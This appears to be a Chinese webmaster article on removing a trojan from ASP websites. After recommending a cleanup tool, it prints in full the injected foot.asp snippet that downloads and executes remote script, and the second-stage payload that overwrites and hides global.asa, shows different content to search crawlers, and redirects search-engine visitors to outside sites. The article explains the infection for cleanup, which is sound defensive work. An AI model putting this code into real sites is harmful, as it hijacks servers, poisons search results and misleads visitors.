欢迎来到福编程网,本站提供各种互联网专业知识!

网站中Global.asa木马的快速清除方法

发布时间:1970-01-01 作者:佚名 来源:互联网
最近客户的多个页面中了远程加载一些代码的页面,主要是利用MSXML2.serverXMLHTTP来加载一些代码并执行,下面是具体的解决方法。
解决办法:

1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:http://www.jb51.net/softs/12771.html

2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:

3、关闭服务器上的缩略图功能 方法参考 http://www.jb51.net/os/windows/Win2003/34960.html

根源:

这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:

复制代码代码如下:

<%

'by*aming

Function Gethtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

Gethtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write Gethtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

Gethtml = objStream.ReadText

objStream.Close

set objStream=Nothing

End Function

execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))

%>

清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!

xmlasaquan.txt的内容如下:

复制代码代码如下:

'

'

'by*aming

Server.ScriptTimeout=600

Public Function createasa(ByVal Content)

On Error Resume Next

Set fso = Server.CreateObject("scripting.filesystemobject")

set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))

f.Attributes=0

Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

Obj.Type = 2

Obj.open

Obj.Charset = "gb2312"

Obj.Position = Obj.Size

Obj.writetext = Content

Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2

Obj.Close

Set Obj = Nothing

f.Attributes=1+2+4

set f=Nothing

Set fso = Nothing

End Function

Public Function GetHtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

End Function

Function check(user_agent)

allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")

check_agent=false

For agenti=lbound(allow_agent) to ubound(allow_agent)

If instr(user_agent,allow_agent(agenti))>0 then

check_agent=true

exit for

end if

Next

check=check_agent

End function

Function CheckRobot()

CheckRobot = False

Dim Botlist,i,Repls

Repls = request.ServerVariables("http_user_agent")

Krobotlist = "Baiduspider|Googlebot"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(Repls,Botlist(i)) > 0 Then

CheckRobot = True

Exit For

End If

Next

If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1

If Session("ThisCheckRobot") = 1 Then CheckRobot = True

End Function

Function CheckRefresh()

CheckRefresh = False

Dim Botlist,i,Repls

Krobotlist = "baidu|google|sogou|soso|youdao"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then

CheckRefresh = True

Exit For

End If

Next

End Function

Sub sleep()

If response.IsClientConnected=true then

Response.Flush

else

response.end

end if

End Sub

If CheckRefresh=true Then

cnnbd=lcase(request.servervariables("HTTP_HOST"))

response.redirect("http://www.82767.com/?"&cnnbd&"")

'Response.Write("如果您的浏览器不支持跳转,请点击进入>>>>>>

")

response.end

end If

user_agent=Request.ServerVariables("HTTP_USER_AGENT")

if check(user_agent)=true then

body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")

response.write body

response.end

else

asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt")

if instr(asa,"by*aming")>0 then

createasa(asa)

end if

ScriptAddress=Request.ServerVariables("SCRIPT_NAME")

namepath=Server.MapPath(ScriptAddress)

If Len(Request.QueryString) > 0 Then

ScriptAddress = ScriptAddress & "?" & Request.QueryString

end if

geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress

geturl =LCase(geturl)

'response.write replace(namepath,server.MapPath("/"),"")

'response.end

'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and

if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then

agent = lcase(request.servervariables("http_user_agent"))

referer = LCase(Request.ServerVariables("HTTP_REFERER"))

bot = ""

Amll = ""

if instr(agent, "+") > 0 then bot = agent

if instr(agent, "-") > 0 then bot = agent

if instr(agent, "http") > 0 then bot = agent

if instr(agent, "spider") > 0 then bot = agent

if instr(agent, "bot") > 0 then bot = agent

if instr(agent, "linux") > 0 then bot = agent

if instr(agent, "baidu") > 0 then bot = agent

if instr(agent, "google") > 0 then bot = "nobot"

if instr(agent, "yahoo") > 0 then bot = "nobot"

if instr(agent, "msn") > 0 then bot = "nobot"

if instr(agent, "alexa") > 0 then bot = "nobot"

if instr(agent, "sogou") > 0 then bot = "nobot"

if instr(agent, "youdao") > 0 then bot = "nobot"

if instr(agent, "soso") > 0 then bot = "nobot"

if instr(agent, "iask") > 0 then bot = "nobot"

if bot="nobot" then

'Call WriteErr

'response.end

end if

Call sleep()

end if

end if

'

相关推荐